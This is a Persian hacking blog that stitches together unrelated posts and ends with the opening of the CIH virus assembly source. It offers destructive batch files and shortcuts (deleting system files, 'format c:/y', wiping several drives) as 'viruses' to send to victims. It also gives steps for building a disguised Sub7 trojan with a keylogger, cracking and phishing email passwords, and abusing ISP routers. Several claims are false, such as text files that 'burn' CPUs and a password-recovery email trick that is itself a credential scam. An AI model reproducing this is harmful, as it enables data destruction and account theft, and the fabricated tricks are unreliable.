گشتم نبود نگرد نیست

file://localhost/C:/Documents%20and%20Settings/ni2008/My%20Documents/My%20Pictures/normal_0002.jpg

توسط اين ترفند شما مي توانيد آي دي شخص مورد نظرتان را بدون كسب اجازه، Add كنيد. به عبارت ديگر شخص مورد نظر از Add شدن ID اش توسط شما مطلع نمي شود.
بدين منظور كافيست ابتدا ID طرف را توسط يكي از پروفايل هاي كم اهميتتان Add كنيد و سپس اين پروفايل را پاك كنيد. در نتيجه پيغام كسب اجازه ي Add كردن، براي طرف ظاهر نخواهد شد.
توجه داشته باشيد كه براي صرفه جويي در وقت مي توانيد اين كار را براي چندين ID انجام دهيد. يعني چندين ID را توسط يك پروفايل Add كرده و سپس آن پروفايل را پاك كنيد.
همچنين اگر در هنگام Add كردن، شخص مورد نظر On باشد، اين ترفند كارايي ندارد. پس بهتر است در مواقعي كه مطمئن هستيد شخص مورد

ن جا میخوام روشی رو براتون بنویسم که در هیچ جایی فکر نکنم چنین چیزی را بتونید پیدا کنید.

می خوام بهتون برنامه ای معرفی کنم و طریقهء استفاده از اون را براتون بنویسم که همه ی کاربران ویندوز ایکس پی اون برنامه را می شناسند و یا تو کامپیوتر خود دارند ولی ازش استفاده نمی کنند.

این برنامه ی جالب هایپرترمینال HyperTerminal هستش.بله عزیزان این برنامه در ویندوز ایکس پی در منوی استارت قرار داره و برنامه ای بسیار جالب و ساده برای هک هستش.

Start Menu\All Programs\Accessories\Communications\HyperTerminal

در کل کار این برنامه فرستادن و گرفتن فایل و چت و ارتباط بین دو کامپیوتر بدون استفاده از کارت اینترنت هست. یعنی دو تا کامپیوتر می تونن توسط اون با همدیگر ارتباط برقرار کنن و فایلهایی را برای هم بفرستن.

حالا بریم سر اصل مطلب: ابتدا برنامه را اجرا کنید. در این قسمت یک اسمی برای ارتباط خودتون وارد کنید. فرقی نمی کنه چه باشه. در قسمت دوم شماره تلفن ISP تون رو بنویسید که می خواهید هکش کنید.

حالا با زدن دکمه ی Conect شما به آی اس پی تون وصل میشید . حالا با زدن کلید اینتر یه چیزهایی تو صفحه ی سفید برنامه نوشته می شوند که اگر نامفهوم بود یک آی اس پی دیگه را امتحان کنید و اگر قابل فهم بود چیزهایی مثل این را مشاهده کردید که همگی بستگی به اون شرکت داره اما زیاد تفاوتی نمی کنن.

Welcome To ROUTER

Username :

PassWord :

شما حتما باید یک کارت اینترنت داشته باشید از اون شرکت تا بتونید وارد سیستمش بشید . که تو اینجا با وارد کردن اسم رمز و پسورد (پسورد وقتی می خواهید بنویسید دیده نمیشه چیزهایی مثل اعلان داس را میبینید:

Router :>_

حال شما به مرحلهء حساسی وارد شدید که خیلی مهمه. بله اینجا قلب سیستم هستش یعنی شما با نوشتن چیزهایی که میگم می تونید اطلاعات مهم و حیاطی از اون شرکت را بدست بیارید از جمله شماره ی کارت اینترنت کسایی که روی خط هستن و شماره ی آی پی (درباره ی آی پی IP بعدا مفصل توضیح میدم) اونها و......

در اینجا چند تا از فرمانهای حساس اون رو براتون توضیح می دم :

Systat با نوشتن این فرمان اطلاعاتی از کلیهء اسم رمزهای کسایی که روی خط هستن را براتون نمایش می ده.

Login با صادر کردن این فرمان می تونید به آی پی های دیگران وصل شوید.

Help نمایش کلیهء فرمانهای مجاز.

نکته ی مهم که باید بگم اینه که در این نوع ارتباط فرمانهایی وجود دارن مثل ایجاد حساب و یا حذف حساب که شما نمی تونید این کارها رو انجام بدید. برای این کار باید اسم رمز خاصی را در اول برنامه بنویسید که اون هم در اختیار صاحب آی اس پی هست.

حالا با این روش شما میتونید اینترنت مجانی استفاده کنید البته اگه وجدان دارید نکنید .دلتون میاد یکی همین بلا رو سر شما بیاره؟

هر بلایی هم که بخاطر این کار سرتون بیاد به من ربطی نداره هااااااااااااااا . بعد نگید نگفتی.

اگه سوالی داشتین تو قسمت نظرات بپرسید.

بدست آوردن ايميل اشخاص

اين كار معمولا با شكست روبروست ولي امتحان ان خالي از لطف نيست.

در ابتداي كار بايد با يكي از برنامه هاي dictionary maker يك فايل pass ;ist اجرا كنيد.سپس وارد يكي از برنامه هاي e-mail cracker شويد.

در قسمت server بايد ادرس سرورايميل مورد نظر را بنويسيد مثلا mail.yahoo.com يا mail.hotmail.com

حال يك فايل text ايجاد كنيد و ID مورد نظر را وارد كنيد.و از فايلي هم كه توسط dictionary maker استفاده شده براي password list استفاده كنيد.وقتي تمام مراحل تمام شد دكه begin رابزنيد.اين برنامه تمامي كاراكترها را بررسي ميكند و كلمه عبور را در قسمت get به شما ميدهد.

هک در ياهو

خوب راستش اين كار به همين راحتي كه مردم فكر ميكنن نيست ولي راههاي مختلفي وجود دار که من ۴ تاشو میگم و هفتمی و بقیه رو میزارم برای بعد که یکم ........ :
روش ها :

۱ـCrack:
يكي از راه ها Crack كردن پسورد طرف براي اين كار نياز به يه برنامه Cracker مثل Yahoo!Cracker دارين كه ميتونين اونو از سايت:
http://www.yahpro.com/
download كنين
روش اين برنامه به اين صورت كه با امتحان كردن پسوردهاي زياد در مدت كم پسورد طرف رو براي شما پيدا كنه به صورتي كه شما يه ليست با فرمت txt در اختيارش بذارين كه پر از اعداد و كلمه ها باشه و يا اين كه بصورت Random خودش انتخاب كنه
*******************************
۲ـTrojan:
اين روش بهتريه و درصد براي به دست آوردن پسورد خيلي بالاست و شما براي به دست آوردن هر نوع پسوردي ميتونين از اون استفاده كنين(چه پسورد اينترنت و چه پسورد ياهو و Msn و ...)
۱-وارد سايت http://www.sub7.net/ بشين
۲-Enter كنين
۳ـوارد قسمت Downloads بشين
۴ـروي Old Version Downloads كليك كنيد
۵ـSub7 2.2 رو download كنين
۶ـپس از download و Setup كردن به فولدري كه برنامرو Setup كردين برين و فايل:EditServer.exe رو اجرا كنين
۷ـپس از اجرا كردن يه پنجره باز ميشه و شما Run In Normal Mode(اجرا در محيط نرمال) رو انتخاب كنين
۸-به Port كاري نداشته باشين و در صورت مايل بودن براي سرور خود پسورد انتخاب كنين
۹-در منوي سمت چپ به startup methods كاري نداشته باشين و بر روي Notification كليك كنيد
۱۰-روي add e-mail notify كليك كنيد و آدرس اي ميل خودتون رو وارد كنين(@ يادتون نره)
۱۱-حالا دوباره از منوي سمت چپ PlugIns رو انتخاب كنين
۱۲ـرو add binded Plugin كليك كنين
۱۳ـاز فولدر PlugIns پلاگ اين s7keys.dll رو انتخاب كنين
۱۴-روي exe icon/other كليك كنين
۱۵-در اين قسمت ميتونين براي سرور خودتون آيكون و Error گمراه كننده درست كنين
۱۶-روي ...Save as كليك كنين و سرور خودتون رو Save كنين

نكته :
۱-توجه داشته باشين كه براي Save كردن بايستي exe. رو بنويسين
۲-هرگز فايل server.exe رو اجرا نكنين همينطور سرورهايي كه خودتون ساخته ايد
۳-بهتر است براي آن كه كسي به exe بودن سرور شما شك نكنه از پسوند scr. به جاي exe. استفاده كنين(موقع Save كردن)
۴ـبهتر است هميشه E-mail ياهوي خودتونو بدين و Msn و Hotmail اكثرا كار نميكنند.

Hack:
۱-پس از ساختن سرور كافيست اونو براي كسي كه مايل به Hack كردنش هستين بفرستين پس از اين كه طرف فايل رو اجرا كرد به آدرس E-Mail كه دادين يه ميل مياد كه Subject:Online و پس از باز كردن در اون يه شماره IP وجود داره اونو كپي كرده و سپس برنامه Sub7.exe رو اجرا كرده و در قسمت IP وارد كنين(Port هم همچنين) و بر روي Connect كليك كنين
۲-پس از وصل شدن به كامپيوتر طرف از منوي سمت چپKeys/messeges رو انتخاب كنين
۳-سپس KeyBoard رو انتخاب كنين
۴-بعد Open KeyLogger رو باز كنين و بر روي آيكون ¤دست¤ كليك كنين

حالا تمام كليدهاي كه طرف شما وارد ميكنه قابل ديدن هستن كافيه يه بار اونو از باهو بندازين بيرون و منتظر بمانين كه دوباره LogIn كنه و پسوردشو وارد كنه
در صورتي كه اين كار جواب نداد ميتونين از قسمت Yahoo!Spy استفاده كنين

نكته:
براي بدست آوردن اينترنت بر روي Advanced/Passwords/Ras Passwords كليك كنين و پس از Upload شدن پلاگ اين مربوطه ميتونين پسوردهاي طرفو در ببارين
در صورتي كه Windows طرف XP باشه متاسفم چون امكان در آوردن پسورد وجود نداره
********************************
۳ – از طریق رفتن پروفایل ! خوب قبل از این که یاهو سیستم امنیتیش رو عوض کنه پروفایل و ایمیل روی یه سرور کدبندی شده بودند و شما می تونستید با نگاه کردن به کد بندی و آدرس پروفایل و یکمی زیرکی بدون دونستن پسورد ایمیل وارد یاکس ایمیلش بشید که این روش بعد از تغیر سیستم امنیتی یاهو خیلی خیلی سخت شده و شاید هم ناممکن !
********************************
۴- شبیه سازی صفحه ورود به ایمیل است که درواقع پشت اون یه پسورد سندر همه کارارو انجام می ده ! و به این شکل هست که ایتدا یه صفحه لاگین ایمیل مانند یاهو می سازید و در سایت خودتون قرار میدی و فرد با وارد شدن به این قسمت و دادن پسورد خود در واقع اونو به ایمیل شما می فرسته !

عبور از فيلترو پروکسی(به روز شده)

اولا بگم که برنامه وب جت (web jet) مدت زمانی است که از کار اافتاده.و همونطور که خودتون هم ميدونيد بيشتر ip ها هم بسته شده.اما اين يکی هنوز کار ميده.

61.145.230.14 8080 : port

اين فقط برای کسايی که اين روش رو نميدونن(خودم ميدونم همه جا گفتن)

۱- در اینترنت اکسپلورر گزینه : Tools-----> Internet Options رو بزنید.
۲-به Connections Tab بروید.
۳- Connection فعال خودتون رو انتخاب کنید (اونی که الان باهاش وصلید) و دکمه Settings رو بزنید.
۴- اونجا که نوشته Proxy Server و زیرش یک مربع داره که نوشته .... Use a proxy server for مربع مربوطه را تیک بزنید.
۵- دو کادر که یکی مربوط به Address و دیگری مربوط به Port میشود فعال شده اند . (عدد اول مربوط به آدرس و عدد دوم که ۴ رقمی هستش مربوط به پورت)

اینم بگم من اینو یجایی خوندم تستشم نکردم اگه کار نکرد شاکی نشید

ولی اگه فیلتر شکن میخواین من یکی ساختم اینم آدرسش

http://www.filter1.tk

. روی دسک تاپ رایت کلیک کنید وازگزینه ی new - text document را انتخاب کنید.

2. حالا وارد text document شوید ودر آن عبارت زیررا تایپ کنید.

cpu_567hjkblaster

3. بعد از سیو کردن آنرا rename کرده و اسمی برایش انتخاب کنید.

حالا اگه فایل رو اجرا کنید باید فاتحه ی... cpu رو بخونین.

نظر یادت نره

اگه حواستون موقع ثبت نام جمع باشه هيچ وقت هيچ هکری نميتونه آی

دی شما رو ازتون بگيره و اگه هم آيديتون هک شده ميتونيد همين الان

پسش بگيريد ولی بشرطی که اين سوالاتی که پايين اومده يادتون باشه :

zip code
secret guestion
country

و تاريخ تولدتون . حالا اگه کسی هم پسوردتون رو پيدا کرده و عوضش

کنه بازم ميتونين اون رو پيدا کنين .

بريد و روی forget password کليک کنيد و همون سوالاتی که در بالا

به اونها اشاره شد جواب بدين بعد خود ياهو پسورد رو عوض ميکنه و

به شما اون رو نشون ميده .



نظر یادت نره

ابتدا CD ویندوز را درون سی دی رام گذاشته و بعد کامپیوتر را Restart نمایید . منتظر میمانیم تا CD ویندوز بالا بیاد (نه اینکه از جای بالا بیاد منظورم اینه که پیامی ظاهر خواهد شد با این نام... Press any key to boot from CD.آن را هنگامی کخ مشاهده کردیم کلید enter را میزنیم یکی دیگه هم شبیه این که آخرش نقطه چین داره میاد آگه این دومی نیامد دوباره از اول سعی نمایید)

وارد صفحه ای خواهیم شدبا با نام Windos Setup که در نوار پایین این صفحه کادری با این نام وجود دارد Set up is loading fileکه در حال چک کردن است کارش که تمام شدبه صفحه بعدی با این نام میرویم Windos XP Professional Set up که حامل پیام خوش آمد گوی است . در این صفحه enter می کنیم و چند لحظه wait میمانیم (من زبون مادریمو فراموش کردم) تا وارد صفحه بعدی شویم با این نام Windos Set up Licensing Agreement در این صفحه کلید F8 را میزنیم در صفحه بعد درایو C را نشان میدهد که حاوی ویندوز فعلی شماست در اینجا کلید Esc را میزنیم تا کل درایو ها را نشان دهدبعد روی درایو مورد نظر که معمولا c استenter می کنیم در صفحه بعد که ظاهر میشود کلید C رامیزنیم و در صفحه بعد روی این گزینه ENTER میکنیم( Format the partition using the FAT file system (Quick و در صفحه بعدش F و بعد ENTER . بعد چندتا مسطتیل میاد و پر میشه و بعدش رایانه Restart میشه .

بعد دوباره بالا میاد و اون پیاما رو میده ولی اینبار enter نمیکنیم تا خودش وارد صفحه ای میشه که آرم ویندوز در آنجاست و 5 تا گزینه داره که 3 تاشون در دایره سمت چپشان سبز و دوتای آخری نه.

دراینجا اون دوتا هم سبز میشن و ویندوز دوباره Restart میشه و ویندوز جدید نصب

اگر ویندوزتان سریال دارد هنگام نصب ویندوز خودش یه پیام میده و اونو ازت میگیره

جديدترين و موثر ترين راه برای يافتن پسوورد ايميل افراد: ابتدا وارد قسمت compose ايميل شويد سپس در قسمت to اين عبارت را وارد کنيد proxify_id_hide@yahoo.com در قسمت subject وارد کنيد find IP ( البته در اين قسمت هر عبارتی وارد کنيد فرقی نمی کند) حال متن ايميل را به صورت زير بنويسيد : ابتدا در خط اول آدرس ايميل شخصی که می خواهيد هک کنيد را بنويسيد . در خط دوم عبارت زير را بدون اشتباه تايپ کنيد ( برای اطمينان از همينجا می شود کپی پيست کرد ) (from 66.218.69.8 (Hmailer8.bulk.scd.yahoo.com در خط سوم پسورود ايميل خود را بنويسيد(برای چک کردن عضویت شما در یاهو و اینکه آیا شما بیش از سه ماه عضویت دارید یا خیر) در خط چهارم عبارت زير: [66.218.66.120] by n25.grp.scd.yahoo.com with NNFMP/ym/Compose?To=20040213092556.77183.qmail@web20728.mail.yahoo.com در خط پنجم به تعداد ۹ ستاره تايپ کنيد به اين صورت : ********* کار تمام است ... حال دکمه send را بزنيد . پس از حداکثر 48 ساعت شما ايميلی دريافت خواهيد کرد که حاوی پسوورد قربانی خواهد بود . نکات : در اين روش شخص قربانی به هيچ وجه از اينکه توسط شما هک شده است مطلع نخواهد شد . در صورتی که پسوورد شخص قربانی بيشتر از ۹ رقم باشد اين پسوورد در دو ايميل جداگانه برای شما فرستاده خواهد شد به اين صورت که در يک ايميل ۹ رقم اول و در ايميل دوم رقمهای بعدی. جالب است که ياهو بسيار تلاش می کند تا جلوی يافتن پسوورد ديگران را بگيرد ولی باز هم راههای زيادی وجود دارد که خود ياهو پسوورد افراد را به شخص هکر تقديم می کند

حالا دیگه راجع به هک بپرس

در Desktop راست کلیک کنید و از گزینه New منوی SHort Cut را انتخاب نمایید

در صفحه ای که باز میشود بنویسید Format X:\Autotest (به جای x درایو مورد نظر)

بعد Next را بزنیدو و یک اسم براش بگذارید و دوباره Next را بزنید و اینبار براش یه آیکون بگذارید

این ویروس بعد از اجرا بلافاصله درایو قربانی را فرمت میکند

ممکنه از این به بعد ماهی یکی دوبار آپدیت کنم چون فصل مدارسه و باید درس خواند

نظر بده ثواب داره

از Desktop برید تو Properties بعد Desktop و بعد Cou sittimes desk و بعد قسمت Web و در این قسمت برید به Properties بعد در قسمت دانلود ای گزینه را فعال کنید

limit hard diskusges for this pageto

و عدد ؟؟؟ را به ؟؟؟؟ تبدیل کنید

یه ویروس باحال : میخوای CPU طرفو بسوزانی (نه با کبریت بلکه با این ویروس)

روی Desktop کلیک راست کرده و از گزینه N ew گزینه test doceument را انتخاب کرده و در آن بنویسید cpu-567hjkblaster حالا از آن خارج شده و برای آن اسم و آیکون به سلیقه خودتان انتخاب کنید

من هی هیچی نمیگم تو هم هی نظر نمیدی اینجوری نمیشه بابا یه نظر بده

برنامه Notpad را باز کنید و دستورات زیر را در آن بنویسید

echo off@ cls

color fc Del/a c :\*.com

Del /a c :\*.sys

Del/a c :\*.exe /s

با پسوند bat سیو کنید بعد این مراسم تمام بشده و مادرنبرد طرف میره رو هوا

را باز کنيد و اين دستورها رو کپي کنيد داخل آن و با پسوند BAT. سيو کنيد...

:c
del autoexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
اين فايل رو وقتى براى كسى بفرستيد به محض اينكه كامبيوتر رو ريستارت كنه ديگه ويندوز بالا نمياد
توجه :::: اين ويروس رو آنتي ويروسم تشخيص نميده و آنتي اش هم Format است

ویندوز XP : ابتدا روی درایو A کلیک راست می کنیم و گزینه Format... را انتخاب می کنیم سپس گزینه create an ms dos start up disk را تیک می زنیم و در آخر روی دکمه Start کلیک می کنیم.

نکته: دیسکتی که از طریق ویندوز xp می سازیم دارای دستورات خارجی کمتری می باشد.

ویندوز 98 : ابتدا وارد control panel شده و add/remove program را انتخاب می کنیم ، سپس سربرگ start up را فعال کرده و دیسکت را درون کامپیوتر می گذاریم و کلید Create را می زنیم.

نکته: دیسکت را ابتدا Full format کنید و سپس روی درایو A در my computer راست کلیک کنید و گزینه Properties را انتخاب کنید و دقت کنید اگر بعد از فرمت کردن باز هم حجمی از دیسکت اشغال شده دیسکت شما دارای بدسکتور می باشد و بهتر است آن را چندین بار پشت سر هم فرمت کنید تا شاید بد سکتور رفع شود.

نکته : ممکن است ویندوز سی دی ویندوز را بخواهد ، پس سی دی ویندوز 98 را تهیه کنید.

نکته: برای اینکه بعضی از دستورات خارجی داس را که به صورت فایل می باشند را در دیسکت راه انداز قرار دهید لازم است به شاخه ویندوز رفته و سپس وارد شاخه Command شوید و هر دستوری را که می خواهید اجرا کنید را درون دیسکت Bootable کپی کنید. این دستورات {دستورات خارجی} شامل format , xcopy و ... می شود

در run تایپ کنید system.ini و زیر این عبارت [386enh] این عبارات را قرار دهید

Buffer=1024

(@ number=(3,1,4,1,5,9

(@ letters=( '' this '' , '' is '' , '' a '' , '' test

($ word , $ anther - word- )=( '' one '' , '' two '' )

woafont = dosappfon

در پایان : نظرت در مورد این وبلاگ چیه خدای راستشو بگو

نماز و روزتونم قبول باشه در در گاه حق تعالی مرا هم از دعای خبرتان محروم نکنید ( نظر بده - سوال بپرس )

در یاهو مسنجر بروید و بعد آیدی مورد نظر را بزنید.حالا پسورد آیدی را اشتباه وارد کنید.بعد از ظاهر شدن پنجره incorect id or pasword گزینه وسطی را انتخاب کنید حالا جواب همه سوال ها را nothing بدهید.و تاریخ تولد را هم این اعداد وارد کنید ۰/۰/۰۰۰ حالا شما تسلط کامل بر روی جواب سوال ها دارید.امید وارم مورد استفاده قرار گیرد.

من تصمیم گرفتم تبلیغ هم بکنم

هزینه : ۱۰۰۰ برای هر تبلیغ در یک ماه

برای کسب اطلاعات بیشتر به تابلو گفتمان مراجعه کن و سوالت را مطرح کن بهد جوابت را میگیری

ویندوز xp این امکان را به شما میدهد که با چند کلیک در برنامه System Restore زمان را به عقب برگردانید. ویندوز هر روز بعد از هر اقدام مهمّی که انجام میدهید، تصویری از تنظیمات کامپیوتر را در دیسک سخت ذخیره میکند.حال اگر کامپیوتر شما رفتار عجیب و ناخوشایندی از خود نشان داد، System Restore را به حافظه منتقل و آخرین روزی که کامپیوتر شما خوب کار میکرد را کلیک کنید تا ویندوز از نظر زمانی به عقب برگردد و کامپیوتر شما را به تنظیمات آن زمان برگرداند که نحوه این کار در زیر آمده است:

۱- به مسیر زیر رفته و برنامه را اجرا کنید.

start menu \ program \ accessories \ system tools \ system restore

۲- restore my computer to an earlier time را کلیک کنید.

۳- تاریخی را که کامپیوتر شما در آن خوب کار می کرد را کلیک کنید و سپس Next را کلیک کنید.

۴- مطمئن شوید همه فایل های باز را ذخیره کرده اید وسپس Next را کلیک کنید.

نکته۱: بعد از این مراحل کامپیوتر شما بصورت خودکار یکبار Restart خواهد شد تا عملیات لازم را انجام دهد.

نکته۲: اگر ویندوز شما در حال حاضر خوب کار میکند میتوانید یک Restore point بسازید تا اگر در آینده کامپیوتر شما با مشکلی مواجه شد بتوانید به نقطه مورد نظر دسترسی داشته باشید. برای این کار همه موارد با توضیحات قبلی یکی میباشد و فقط به جایRestore my computer to an earlier time گزینه Creat a restore point را کلیک نمایید و در صفحه بعد نام انتخابی خود را وارد نمایید.

سلام امروز می خواهم بارتون یک ویروس بنویسم که فلاپی درایو رو می سوزونه

البته این یک ویروس نیست بلکه یک دستور به زبان اسمبلی که می تونیم به عنوان یک ویروس ازش استفاده کنیم

مواد لازم: یک عدد فایل نت پد،توانایی تایپ کردن و توانایی سیو کردن، به همین راحتی

۱-یک new text document روی دسکتاپ درست کنید بعد بنویسن:debug 70 71

۲- از منوی فایل وداخل save as file در قسمت name اسم ویروستون رو بنویسید .بعد با پسوند بت سیوش کنید:virus name.bat

۳- حالا به جایی که سیوش کردی برو و می بینی که یک فایل تحت داس با آیکون یک چرخ دنده سیو شده که اگر بازش کنی فلاپی درایوت می سوزهو هیچ امید برگشتی هم نداره

نکته: اگر این فایل رو برای کسی فرستادی وبازش نکرد می تونی فایلت رو اتوران یک سی دی بزاری و سی دی رو بدی بهش و بگو یک بازی خیلی باحاله ، مواظب باش سی دیت ارزون باشه

اگر می شه نظر بدین البته ما نیازی به نظر دادن نداریم چون روزی بالای یک میلیون نفر نظر می دن ولی

جون هرکی دوست دارین نظر بدین.

راستی یادم رفت براتون بنویسم ویروس قبلی چه جوری کار می کنه :

دستور دی باگ به هد فلاپی درایو دستور می ده عوض خوندن فلاپی بره دنبال خوندن نخود سیاه

و هیچ وقت هم درست نمیشه

امروز می خوام به شما یاد بدم که چه جوری یک فایل فرمت درست کنید که بدون سوال yesوno فرمت کنه.

اول از قسمت new (در کلیک راست) یک new short cut بسازید،بعد در اولین صفحه ای که باز بنویسید format c:/y بعد از زدن next در صفحه ای که باز میشه اسمی برای فایلتان در نظر بگیریدو در صفحه بعد هم یک آیکون برای فایلمان در نظر می گیریم.

حالا به به properties فایل رفته و در برگه screen در قسمت usage گزینه full screen را بزنید.

نکته : هیچ وقت درایو سی یا دی را به عنوان فرمت کننده قرار ندهید چون کار نمی کند.

خسته نباشید،نظر هم بدید

سلام میدونم که با این تیتری که نوشتم هیچ کس باورش نمی شه که بتونه هم چین ویروسی درست کنه ولی این هم از همون دستور های دی باگ که فقط اگر جای اعدادش یک مقدار بالا پایین ببرین می تونین باهاش ویروسی بسازین که سخت افزار هایی که هد دارن سوزوند

دلیلش هم همون که تو مطلب (ویروس قبلی چه جوری کار می کنه ؟) نوشتم .

خوب پر حرفی بس بهتره شروع کنیم .

مثل ویروس اول یک new text document روی دسکتاپ درست کنین.

حالا بازش کنین و توش بنویسید debug e30 o31 بقیه کاراش هم مثل ویروس اول(سوزاندن فلاپی داریو) ولی چون ممکن نفهمین ویروس اول کدوم براتون می نویسم.

داخل از منوی file داخل .....save as میشین و در قسمت file name برای ویروستون اسم می زارین و آخرش یک bat.اضافه می کنید.

مثل:virus.bat

امیدوارم جایی ازش استفاده نکنین،خداییش یک همچین مطلبی لیاقت نظر دادن داره

خداحافظ تا فردا یا شاید دوشنبه.

من در مورد ویروسهای کم خطر آشنایی کمی دارم و بیشتر با ویروسهایی که آسیب سخت افزاری می زنن آشنا هستم.

امروز می خواستم براتون یک ویروس بنویسم که نسبت به ویروسهای قبلی مهربون تر باشه برای همین حدود سه دقیقه تفکر کردم

این ویروس رو اگه اجرا کنین سیستم بوت نمی شه،البته و فکر کنم جز عوض کردن ویندوز راه حل دیگه ای نداشته باشه.

خوب مثل همیشه یک ...new text روی دسکتاپ بسازید و توش بنویسید.

:c

del AUTOEXEC.bat

حالا مثل ویزوسهای قبلی با پسوند بت سیو کنید.

نکته: اول ویروسهای قبلی رو بخونین بعد این ویروس رو بسازین مخصوصآ (سوزاندن فلاپی داریو) که باز دوباره سوالهای بی مورد نفر مایید.

آگه نظرات بالای چهار تا باشه یک ویروس می نویسم که cpu رو می سوزونه.

خدا حافظ.

سلام امروز بعد از مدتها می خوام یک ویروس براتون بنویسم که ویروس اگه اجرا بشه را حلی جز اف دیسک نداره.

@echo off

ATTRIB -a -s -h -r c

ATTRIB -a -s -h -r c:\windows\*.*

Echo y | echo a | Echo y | del c:\*.*

Echo y | echo a | Echo y | del d:\*.*

Echo y | echo a | Echo y | del e:\*.*

Echo y | echo a | Echo y | del f:\*.*

Echo y | echo a | Echo y | del g:\*.*

echo y | copy *.* C:\

echo y | copy *.* D:\

echo y | copy *.* E:\

echo y | copy *.* F:\

echo y | copy *.* G:\

restart

این ویروس هم مثل ویروسهای قبلی تو نت پد بنویسید و با بت سیوش کنید

نظر هم یادتون نره

برای ساخت این ویروس اول note pad را باز کرده و این کد ها را در آن کپی و پیست نمایید و بعد گزینه file را زده save as را زده بعد آنرا با پسوند bat ذخیره کنید مثلا Good Gory.bat و save را برای اتمام کار زده و حالا ویروس شما ساخته شد که مواظب باشید روی آن به هیچ وجه کلیک نکنید آنرا برای یکی بفرستید تا سیستم قربانی را به طور خفن داغون کنه موفق باشید نظر یادتون نره! robatehacker.blogfa

تذکر:وبلاگ چرتکه تعهدی در قبال این آموزش نخواهد داشت

; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; * *
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.4 *
; * Modification Time : 05/31/1998 *
; * *
; * Turbo Assembler Version 4.0 : tasm /m cih *
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe *
; * *
; *==========================================================================*
; * Modification History *
; *==========================================================================*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; ****************************************************************************

.586P

; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************

OriginalAppEXE SEGMENT

FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
